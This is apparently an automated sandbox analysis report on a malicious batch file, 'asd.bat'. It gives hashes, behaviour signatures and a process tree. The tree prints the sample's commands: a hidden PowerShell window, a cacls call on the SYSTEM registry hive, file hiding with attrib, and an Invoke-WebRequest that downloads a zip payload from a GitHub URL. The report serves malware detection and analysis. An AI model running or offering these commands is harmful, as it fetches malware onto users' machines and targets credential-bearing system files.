Analysis
-
max time kernel
1562s -
max time network
1567s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
23-10-2024 17:22
Static task
static1
Behavioral task
behavioral1
Sample
asd.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
asd.bat
Resource
win10v2004-20241007-en
General
-
Target
asd.bat
-
Size
1KB
-
MD5
0dababeef5a7a86809d847382772d821
-
SHA1
612be301ee1bc7a422f79b2d17822ee2244efc4c
-
SHA256
56af74c6f17f1e987ace45d8ec180ed38d221f2fdfe9d601bdec2d703689bdb4
-
SHA512
1ec9342d34914503dc475fd5fb300cbbb2ace1e9b6e8cc1b9221dd3468eb64a1e0d7f3d0c6f8427207239c61c4b8fb87da89f88f6920b95ef928dd1214d17d6a
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 2016 powershell.exe 2724 powershell.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid Process 2296 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 2016 powershell.exe 2724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 2296 wrote to memory of 2016 2296 cmd.exe 32 PID 2296 wrote to memory of 2016 2296 cmd.exe 32 PID 2296 wrote to memory of 2016 2296 cmd.exe 32 PID 2296 wrote to memory of 2368 2296 cmd.exe 33 PID 2296 wrote to memory of 2368 2296 cmd.exe 33 PID 2296 wrote to memory of 2368 2296 cmd.exe 33 PID 2296 wrote to memory of 2704 2296 cmd.exe 34 PID 2296 wrote to memory of 2704 2296 cmd.exe 34 PID 2296 wrote to memory of 2704 2296 cmd.exe 34 PID 2296 wrote to memory of 2724 2296 cmd.exe 35 PID 2296 wrote to memory of 2724 2296 cmd.exe 35 PID 2296 wrote to memory of 2724 2296 cmd.exe 35 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\asd.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:2368
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:2704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CJKS7Q3M8A64M2K7Q4NJ.temp
Filesize7KB
MD5033fcc0b5033f7808cbed0688f29f42d
SHA11b218e47109eeff68eb729f56e06ed55483015ca
SHA256f841df001eb98816ddae2df220554a9c20f3639867f76b33ac823451baaa2cbc
SHA5127477a65c860eb592a9a939f32207e6689eb3d258b4372f402fd88506d5bebf06633b383c9d3f888d958fb0cb2138e643b97a286ff5d624c50c02d22f3c9d1044